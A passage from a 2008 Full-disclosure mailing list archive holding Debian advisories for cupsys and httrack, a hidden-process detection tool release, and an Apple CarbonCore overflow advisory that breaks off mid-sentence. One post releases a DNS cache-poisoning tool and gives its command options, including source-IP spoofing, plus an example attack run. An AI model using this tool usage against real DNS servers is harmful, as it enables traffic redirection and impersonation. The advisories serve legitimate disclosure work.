7c91af84b2fab2419fa4939bb8080097 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 1552918 7d7af09023892fdd9e862ddcbb590fb3 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 150896 ba6b2f7c16957759b63e20d66d5964f2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 36064 702ec7fbc7b2716e10a97f7b7c11e75a http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 158270 0354f63d7126c3775cc74a95426052d4 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 57846 2ee768d4dc5f9c8cbd046a801f154ef8 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 1084676 bb31572c9939fe22762ceef59550b25e http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_mipsel.deb Size/MD5 checksum: 77456 5884939dabb325cda97351bafdb62cfe powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 162918 05df3db670b3f2a4dbb9d8a2d666eaca http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 88204 4546a01b202669d3ffa97dca5b93bf03 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 1576028 67c38bd81585274c0844efeedca40153 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 51894 321b1c0c9d59643294a87b00f81f7895 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 41310 45f55f0797900433a145028d63f6a6ef http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 90004 61698739b3b436e6d1651dc388a89575 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 1142660 10680b3b7efdeb10e9d834e869944206 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_powerpc.deb Size/MD5 checksum: 136880 e5c2d81190a9233eb291b519c3b83de6 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_s390.deb Size/MD5 checksum: 166424 a2a07e7c586a10000b519c6f6c2ec4e2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_s390.deb Size/MD5 checksum: 1586828 1e581be3892b978e7284de896c3121de http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_s390.deb Size/MD5 checksum: 87588 b3d0d3e7dbb84414f606b4670c6e2692 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_s390.deb Size/MD5 checksum: 1036620 bd1b35bd24260dfb340e0a3173a811a2 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_s390.deb Size/MD5 checksum: 37430 622787f6d8b910f3657f98e0f5bf97bc http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_s390.deb Size/MD5 checksum: 82342 40a55f0afa5b2fa03285fd4d4cd8666c http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_s390.deb Size/MD5 checksum: 52468 470a81c78c7ececae0569e75bfab9ca7 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_s390.deb Size/MD5 checksum: 144932 9ab43b87566469af9e4a79c9c1fae493 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 139570 5f5faa6504275ed43f4a55787519fdfe http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 78516 7066d103f739cd570fd141aa4fa780f6 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 36032 c4e4289091dc19e5fbf7a6937ffb36f7 http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 158816 f33bda24ec7774227b3bdb3dddcf1c46 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 51754 47ce5271662e6b980e34badfc9689009 http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 84956 96aa28ac50548723754274f30db15379 http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 991408 13a41c49f94085ca6a7f74a030506d3c http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch4_sparc.deb Size/MD5 checksum: 1562092 2bfd90bca7dbac40df73303f8e1e4b6f These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSJK+8mz0hbPcukPfAQL+2ggArkU0cevHFbynnNIAPflbwBMYNLW4GvDB IDgHshZ4efGYsnfrEl57h/8GoteXN2c3LWNaI2enBtIRfgpyavHRYqX+Vl+7JjJr +8SxXjqxTnJ+6b7iFQVD5UQlrw77vTVBLA4qVdn/+dMKVKZPKTaozjBzxm3cjzrQ owqSLI+l8MJrsY4Et7ajEUJWOJ0meXY2xIgE32hat5prH7vGJUKab5gxwl96oIyi LPaGSpANk4GJCMAV5YtSpY4zxr3WGrJOQVLrqYmdN0/jrLVuGoNyoy2jy/1k+yT7 QIqV4J748E+ftsMvX/4QxPigIpSqQxVXgXZS52YN/OxJLzUBapskpg== =SW1E -----END PGP SIGNATURE----- From thijs at debian.org Fri Aug 1 08:52:19 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Fri, 1 Aug 2008 09:52:19 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1626-1] New httrack packages fix arbitrary code execution Message-ID: <20080801075219.89076326EFC@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1626-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst August 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : httrack Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no BugTraq ID : 30425 Joan Calvet discovered that httrack, a utility to create local copies of websites, is vulnerable to a buffer overflow potentially allowing to execute arbitrary code when passed excessively long URLs. For the stable distribution (etch), this problem has been fixed in version 3.40.4-3.1+etch1. For the testing (lenny) and unstable distribution (sid), this problem has been fixed in version 3.42.3-1. We recommend that you upgrade your httrack package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1.dsc Size/MD5 checksum: 950 277074178046b94ceebefa5f5eaee9de http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4.orig.tar.gz Size/MD5 checksum: 1626176 9e4de064afc1dfcb6f50b773f8081f1c http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1.diff.gz Size/MD5 checksum: 7597 005a605bfabc7f0830d8db87d3ee67fe Architecture independent packages: http://security.debian.org/pool/updates/main/h/httrack/httrack-doc_3.40.4-3.1+etch1_all.deb Size/MD5 checksum: 516676 9f2c726cbc7e6f97dfeda4f8a72c8e77 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_amd64.deb Size/MD5 checksum: 441370 a37aaf592b7ab95fd11eeec082d4919a http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_amd64.deb Size/MD5 checksum: 395946 7eea58a1b8a7d6d11501ec2e879f0167 http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_amd64.deb Size/MD5 checksum: 61108 0894913629340bd559c929d07a05f19f http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_amd64.deb Size/MD5 checksum: 31766 63db4ac65e705d74d1eab458b33f56e5 http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_amd64.deb Size/MD5 checksum: 491618 e8a2076bb272020be529c39a53eea534 arm architecture (ARM) http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_arm.deb Size/MD5 checksum: 33424 eed7c807ccebd9db0722545849938d0f http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_arm.deb Size/MD5 checksum: 281686 1b4a63e9fea5cdbcd49eb02354fd0608 http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_arm.deb Size/MD5 checksum: 350912 9c85eea85e7bf24b734f259ecba0a303 http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_arm.deb Size/MD5 checksum: 443078 64a26f96bfb086474c47a9f37d9db15d http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_arm.deb Size/MD5 checksum: 59448 70d880740666db737ef8cbc8730e5377 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_hppa.deb Size/MD5 checksum: 34180 5ac05721cb623cf7c25b9bffbc81ad6d http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_hppa.deb Size/MD5 checksum: 65948 7a8fa1831ffadffab827c2a8ecc44068 http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_hppa.deb Size/MD5 checksum: 321760 ee4562bcf5255b6addf8ac0b673d19fe http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_hppa.deb Size/MD5 checksum: 440990 594b8679acb8e05c9b0bede368a86ad3 http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_hppa.deb Size/MD5 checksum: 438154 2bc91f3ebd931a161595b2c95253d15a i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_i386.deb Size/MD5 checksum: 32152 4f545c6163fc8516c6d0dae9ddf6082e http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_i386.deb Size/MD5 checksum: 59458 4c81a59964535c95ccdb08916fc47f63 http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_i386.deb Size/MD5 checksum: 482448 8db927e07b642477f60cb0e4beeb2b3e http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_i386.deb Size/MD5 checksum: 438432 ae91317aa8eb3a32fdf6b5be6a3c153b http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_i386.deb Size/MD5 checksum: 365534 c38c17f82ea6b110c52d17d6a8098563 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_ia64.deb Size/MD5 checksum: 92114 88d98af0e94dbe1137db57341c0d7fe3 http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_ia64.deb Size/MD5 checksum: 35186 fcf89c422fdac82f9e436bd4ff13d161 http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_ia64.deb Size/MD5 checksum: 736406 a4a9b2fdd5d4ba5e0147e56e39a81bb3 http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_ia64.deb Size/MD5 checksum: 450002 523074d62431c05143a8db9d0d3ca8b3 http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_ia64.deb Size/MD5 checksum: 501600 b0b7938e039dc12e6289353407a66f24 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_mips.deb Size/MD5 checksum: 422550 ddefd0cf52d210266bc10c1d6dfec2f1 http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_mips.deb Size/MD5 checksum: 272376 f4312876c36fe9da386f7d10115cc87a http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_mips.deb Size/MD5 checksum: 438438 d37c7460ca2f4a848b4d441d90911d9a http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_mips.deb Size/MD5 checksum: 33282 5f42aacc153fda5b4feac0932455b956 http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_mips.deb Size/MD5 checksum: 64622 aa402be8bab600e6f9a7cc901e11be8b mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_mipsel.deb Size/MD5 checksum: 417812 71a8ae7e5cf51716c6c78debc31ce6a2 http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_mipsel.deb Size/MD5 checksum: 64644 133bbfcee5935a205eb131dc9f363c08 http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_mipsel.deb Size/MD5 checksum: 33654 2b6df5a12a8f3457ee6e6353a73ed7f0 http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_mipsel.deb Size/MD5 checksum: 432074 ef11cd7c26b5330fbf1b744559cd8c14 http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_mipsel.deb Size/MD5 checksum: 271738 ee6ee78ba71e8977f4c6ad954f5356f6 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_powerpc.deb Size/MD5 checksum: 64012 33554371d96a8d344f673f7310dbba34 http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_powerpc.deb Size/MD5 checksum: 556868 b313c676177281c3f6a9c38d9304a741 http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_powerpc.deb Size/MD5 checksum: 433912 d51594790fad947486d48a744abf2823 http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_powerpc.deb Size/MD5 checksum: 350286 59f98436ea6d2fe90a980fe3ce133db4 http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_powerpc.deb Size/MD5 checksum: 33998 1db2f2c7241c8274316c82e353213e00 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_s390.deb Size/MD5 checksum: 33560 7c3edeff7fd589d901f5c1dc67468c0c http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_s390.deb Size/MD5 checksum: 371182 7ef2888222cf6fd4f2751e140fc6f77b http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_s390.deb Size/MD5 checksum: 291818 063df1d6823a3489d3d859100bbe067a http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_s390.deb Size/MD5 checksum: 432386 6f88d4af48ee49e29f548ebde7308a43 http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_s390.deb Size/MD5 checksum: 63462 f6850ab5eb5acd7a870664fef6ec520c sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/h/httrack/proxytrack_3.40.4-3.1+etch1_sparc.deb Size/MD5 checksum: 58698 128e8fa3ec781b8a4bc8cdae7438ef40 http://security.debian.org/pool/updates/main/h/httrack/libhttrack1_3.40.4-3.1+etch1_sparc.deb Size/MD5 checksum: 379330 865d453bb4f80590a0d267b7aa8c5a84 http://security.debian.org/pool/updates/main/h/httrack/webhttrack_3.40.4-3.1+etch1_sparc.deb Size/MD5 checksum: 432042 9a9fc3e7a5db34850ed2fabf9465a214 http://security.debian.org/pool/updates/main/h/httrack/libhttrack-dev_3.40.4-3.1+etch1_sparc.deb Size/MD5 checksum: 553276 1d2d44e03ec1230a13442b4c72333906 http://security.debian.org/pool/updates/main/h/httrack/httrack_3.40.4-3.1+etch1_sparc.deb Size/MD5 checksum: 31910 f9d4ef0ffe87192ac5410b456b9c2eaf These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEUAwUBSJLAh2z0hbPcukPfAQLFrgf4+1LO8Vq/NCswQ4QJ1aLKUMgl4gWYd+HD qNFH+9UqDV0yVVK7sX3mH/PfL0nabuCcDO6ev3MNv+UtjXPji3SYj7eJW3O8I6mL R9hi9kqgUcrHnrRb0QYr++I6VNHb31UYjAvPBUmM0D1mB4C9EYuZecYmptzcqrcX u/c9KEZE7tOT2+2jSYb7pkiNNYHZl954KerTR1einaViphKboI7Urp2p6+ib1U9n mOFAe6JYeea/1o9MAMF1u7I5d82pUS/ZK5W0ShB56DqtKxA02tT0Foa19XpqYoMA Yo+8tJgD8SXuYmfvLQJhiVrszhG0asZZq9yNDgmAgrje59Cw2d2d =GQbA -----END PGP SIGNATURE----- From pallav.khandhar at gmail.com Fri Aug 1 08:00:38 2008 From: pallav.khandhar at gmail.com (Pallav Khandhar) Date: Fri, 1 Aug 2008 12:30:38 +0530 Subject: [Full-disclosure] Tool Release: ProcL - Detect Hidden Process Message-ID: <2DF34E9C-4ADA-4B31-8966-44B8B3DEC099@gmail.com> Greetings, I am glad to release ProcL v1.0. ProcL employs many different methods to detect hidden processes. Essentially, ProcL detailed and implemented a mechanism to embed all these different approaches in one tool to detect hidden processes. Our methods of detecting hidden processes requires the examination of each kernel object - EPROCESS, ETHREADS, HANDLES, JOBS. Therefore, we believe, ProcL would defeat process concealment from one certain method. Hiding a process is particularly threatening because it represents some malicious code running on your system that you are completely unaware of. Process hiding has a significant effect. Many of the trojan, virus, spyware, rootkit writers use similar techniques to hide themselves and stay undetected as long as possible on target machines. Finding all the ways a rootkit might hide a process is just the first step in defending against the rootkits. Detecting hidden objects is a promising new area in rootkit detection. For more information on the tool http://www.scanit.net/rd/tools/03 Download the tool http://www.scanit.net/files/tools/ProcL.zip Cheers, Pallav Khandhar Sr. Security Researcher Scanit R&D Lab -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080801/7e25a404/attachment.html From ar at securebits.org Fri Aug 1 16:33:21 2008 From: ar at securebits.org (AR) Date: Fri, 1 Aug 2008 18:33:21 +0300 Subject: [Full-disclosure] DNS Multiple Race Exploiting Tool Message-ID: <002e01c8f3eb$f0f17800$d2d46800$@org> ############################################################################ ##### Subject: DNS Multiple Race Exploiting Tool release Homepage: http://www.securebits.org/dnsmre.html Download: http://www.securebits.org/tools/dns_mre-v1.0.tar.gz OS: The tool runs on Linux Target OS: Tested against windows 2003 server ############################################################################ ##### 01 Introduction 02 Features 03 Extra Notes 04 Running the Tool 05 Example 06 Credits 01 Introduction --------------- DNS Multiple Race Exploiting Tool exploits an inherent bug in the implementation of DNS Cache. The result of this exploitation is cache poisoning/overwriting with new entries. The exploitation happens by querying a DNS server, that either supports recursion or is configured with forwarders, for non-existent hostnames for a target domain. Along with the queries are fake reply/replies with static Transaction ID(s). Every query will generate another query from the DNS server with a random TXID. If one of the replies contains this specific TXID, the cache is poisoned. Because the replies are sent directly after the query, they will arrive at the DNS server much earlier than the legitimate reply from some Name Server. This attack was discovered and announced by Dan Kaminsky of Doxpara Research in July 2008. 02 Features ----------- A. The tool can attack both unpatched DNS systems as well as patched DNS systems. Attacking a patched system requires a much longer time than an unpatched system though. B. The tool can launch two modes of attack; one is against DNS server that supports recursion, and the second mode is against DNS server configured with forwarder DNS. The attack modes differ in the "flags" carried in the DNS fake replies. Since a DNS with server forwarder(s) sends a query with the "recursion desired" bit set, the reply has to have this bit set, too. Also, the reply has to have the "recursion available" bit set. On the other hand, a DNS server with recursion sends query with the recursion bit unset (i.e. iteration query), the reply has to have this bit unset, too. C. The tool spoofs the source IP address of the queries. This is useful if the attacker does not want leave any trace of his IP address on the server. D. The tool utilizes CNAME Record Type to inject the false entry. The way the poisoning is implemented is by sending two answer Resource Records (RRs): One is a CNAME RR, and the second is an A record. Every fake reply contains something like: [1] abdc.example.com is a CNAME of IN Class for www.example.com [2] www.example.com is an A of IN Class for IP 11.22.33.44 E. The tool sends multiple fake replies with different TXIDs to increase the probability of hitting the correct TXID. This is useful in reducing the time needed to generate a "hit". For a server that does not randomize the source port number, the maximum number of iterations needed is 65546 (an average would be 32768). However, by sending 10 to 15 TXIDs, for example, the probability of making a "hit" is higher in a shorter time; an average of ~3000 iterations are needed. 03 Extra Notes -------------- [*] There is a sleeping time between sending the Query and the Replies. The currently configured value of this time is 100 Milliseconds. This is important because during the test, I found that if the reply is sent directly along the query, the fake reply would arrive at the server before the server sends its own query and the fake reply would eventually be ignored. [*] There is another sleeping time between every iteration (query+replies). This "time" is meant to control the amount of packets per second. Currently, this "time" is 100 Milliseconds. [*] The tool does not create the packets in every iteration. It creates the needed packets (1 query and multiple replies based on the number of TXIDs) at once at the beginning. For later iterations, portions of the packets are modified and re-sent again. This is done for faster operation and to use the least amount of memory. [*] I am currently researching the most optimized and efficient way to poison a DNS system that randomizes the source port address. This includes the threshold number of TXIDs beyond which an attack would be unsuccessful, or sending multiple queries first before sending their corresponding fake replies, and so on. If you have some ideas and suggestions, please write to me at 04 Running the Tool ------------------- The command syntax is: #./dns_mre [options] The options are: -t The target DNS server to poison (required) -n The Name Server used to impersonate (required) -s A spoofed client IP address (optional) -p Source port address used by target to send queries (required) -y Type of the attack (optional; default 1) 0 for Patched Systems 1 for Unpatched Systems -m Attack mode (optional; default 0) 0 Attacking DNS servers configured with forwarders 1 Attacking DNS Servers that perform recursive queries -x Number of Transaction IDs to use (optional; default 15) 05 Example ---------- To attack the DNS server 11.22.33.44 that sends queries from port 1103 and configured with a forwarder to 44.33.22.11, and inject the entry www.domain.org => 3.2.1.4: ./dns_mre -t 11.22.33.44 -n 44.33.22.11 -p 1103 -x 15 -m 0 -s 22.22.22.22 \ www.example.com 88.55.44.48 ################################################################# # DNS Multiple Race Exploiting Tool # ################################################################# [*] Attacking server: 11.22.33.44 [*] Injecting the record: www.domain.org => 3.2.1.4 [*] Replies are from: 44.33.22.11 [*] Replies are delivered to port: 1103 [*] Number of TXIDs to use 15 [*] IP address used in queries: 22.22.22.22 [*] Attack mode: Forwarding DNS Server [*] The attack is against an unpatched system # Initializing...[OK] # Preparing query raw packet....[OK] # Preparing 15 reply raw packet(s)....[OK] # Checking if the server is already poisoned...No, it is not poisoned # Launching the Attack... maximum iternation 65535 wait time between each iteration is 100 milliseconds wait time between the query and reply is 100 milliseconds ############################### 3000 iterations Checking to see if the server is poisoned ....Not yet ############################## 6000 iterations Checking to see if the server is poisoned ....YES ** Attack is Successful ** 06 Credits ---------- - Dan kaminsky for originally discovering the attack and for the nice Webinar on July 24th - Wafa, Saddam, Nicolai, and Ghassan for their support and help -- AR Independent Security Reseacher Securebits (http://www.securebits.org) From security at nruns.com Fri Aug 1 18:29:59 2008 From: security at nruns.com (security at nruns.com) Date: Fri, 01 Aug 2008 19:29:59 +0200 Subject: [Full-disclosure] =?utf-8?q?n=2Eruns-SA-2008=2E005_-_Apple_Inc=2E?= =?utf-8?q?_-_CoreServices_Framework=E2=80=99s_CarbonCore_Framework_-_Arbi?= =?utf-8?q?trary_Code_Execution_=28remote=29?= Message-ID: <48934817.6000301@nruns.com> n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2008.005 01-Aug-2008 ________________________________________________________________________ Vendor: Apple Inc., http://www.apple.com Affected Products: CoreServices Framework?s CarbonCore Framework (Used by: i.e. Safari, Mail) Affected Platforms: Mac OS X v10.4.11 Mac OS X Server v10.4.11 Mac OS X v10.5.4 Mac OS X Server v10.5.4 Vulnerability: Arbitrary Code Execution (remote) Risk: CRITICAL ________________________________________________________________________ Vendor communication: 2008/03/07 Initial notification to Apple Inc. n.runs AG has found a considerable amount of vulnerabilities in Apple most up-to-date Default Systems and Default Installed Products both on Mac OS 10.5 (Leopard) and iPhone 1.1.4, and intends to send them in several phases to Apple Inc. 2008/03/08 Apple Inc. replies to n.runs AG providing their public pgp key. Apple Inc. states that the Apple Inc. RFP will be used instead of the n.runs RFP 2008/03/08 n.runs AG responds that vulnerability reporting will only happen under n.runs AG RFP 2008/03/11 Apple Inc. confirms to n.runs AG that the n.runs AG RFP is aligned to their RFP, and that n.runs may continue with further communication and bug reporting 2008/03/11 n.runs AG sends PoCs for various issues to Apple Inc. 2008/03/11 Apple Inc. acknowledges the PoCs, but has issues reproducing some of the vulnerabilities. 2008/03/12 n.runs AG sends more reliable PoCs along with detailed reproduction steps. 2008/03/24 Apple Inc. sends a status report regarding the vulnerabilities reported by n.runs AG 2008/03/30 n.runs AG thanks Apple Inc. for the status update and apologises for not being more responsive during the CanSecWest time-frame. 2008/03/31 Apple Inc. sends a second status update and provides a link to where the credits will appear (http://support.apple.com/kb/HT1222) 2008/04/01 n.runs AG acknowledges the update and sends a second set of vulnerabilities and PoC based on the good and frequent communications that n.runs AG has had with Apple Inc. so far. 2008/04/01 Apple Inc. thanks n.runs AG for the new PoC, acknowledges them and includes a status report. Some of the issues are reported to be already known to them and/or discovered internally previously to n.runs AG reporting. Apple Inc. also informs that Sergio?s name and company has been added to their system to track credit information for each of the security issues, and provides the Radar IDs assigned to each of them. Apple mentions further issues when trying to reproduce some of the vulnerabilities. 2008/04/01 n.runs AG thanks for the quick response and also clarifies that n.runs AG expects, as described in the RFP, to be credited for all the vulnerabilities reported to Apple Inc. - all of which affect the most up-to-date products available to the public - whether they are internally known to Apple Inc or not. 2008/04/03 Apple Inc. replies: ?Yes, that's our policy: all reporters of non publicly known security bugs get credit.? 2008/05/23 n.runs AG reports another vulnerability and requests a status update for the previously reported vulnerabilities 2008/05/29 Apple Inc. sends a status report and asks how n.runs would like to be credited, if there is some specific format. 2008/05/29 n.runs AG sends the requested information to Apple Inc. 2008/05/31 Apple Inc. sends the status report for the last reported issue, along with its Radar ID. 2008/07/10 n.runs AG requests a status update for the issues reported to Apple Inc. 2008/07/11 Apple Inc. sends the status report. Apple informs n.runs AG that some of the vulnerabilities had already been fixed, for which an update had been released some time ago. Apple Inc. also mentions that one of the vulnerabilities was found through internal security testing; consequently no credit was given, but that would be fixed. Apple Inc. requests the format for the credits that n.runs AG would like to have. 2008/07/13 n.runs AG replies with the following statement: ?As I [Sergio Alvarez] said and you agreed in my first e-mails, before sending any of my findings, whether you found them internally or somebody else reported the same bugs that I'm reporting, you (Apple) have to credit me for my findings for the simple reason that I'm reporting them to you instead of releasing them to the public while the bugs are not fixed. That said, I've checked all the credits given in "iPhone 2.0 and iPod touch 2.0" (http://support.apple.com/kb/HT2351) and the ones given in "QuickTime 7.5" (http://support.apple.com/kb/HT1991), and I haven't been credited in any of them. This is a clear violation of our RFP. If by Monday, July 14th 2008 the proper credits are not given to me, I'll release all the vulnerabilities and bugs that I've reported to you and also the ones I didn't report yet by Tuesday, July 15th 2008.? 2008/07/15 Apple Inc. asks n.runs AG not to make their findings public and also publishes the credits for one of the issues reported. Apple also provides a status report for the previous findings. 2008/07/15 n.runs AG provides further use-cases and attack vectors information to Apple Inc. 2008/07/23 Apple Inc. creates a new security ID for the use-cases and attack vectors reported as a design issue to fix. 2008/07/23 n.runs thanks Apple Inc. for the feedback and asks for a status report update 2008/08/01 Apple Inc. notifies n.runs AG of the imminent release of an update and sends the related advisory and credits. (The update and credits were already available at the time n.runs AG read the email sent by Apple Inc.) 2008/08/01 n.runs AG releases this advisory ________________________________________________________________________ Overview: Carbon is a set of C APIs offering developers an advanced user interface toolkit, event handling, access to the Quartz 2D graphics library, and multiprocessing support. Developers have access to other C and C++ APIs, including the OpenGL drawing system and the Mach microkernel. CarbonCore gathers together a number of lower-level Mac OS Toolbox managers. Some of these are deprecated but essential to porting to Carbon. CarbonCore includes the old Device Manager, Date and Time Utilities, the Finder interface, Mixed Mode, CFM, the Thread Manager, the Collection Manager, the Script Manager, and more. Most of the Toolbox defines are in here. Description: A remotely exploitable vulnerability has been found in the file name parsing code. More specifically, passing a long file name to the CarbonCore framework file management API will trigger a stack buffer overflow. Impact: This problem can lead to remote arbitrary code execution if an attacker carefully crafts a file that exploits the aforementioned 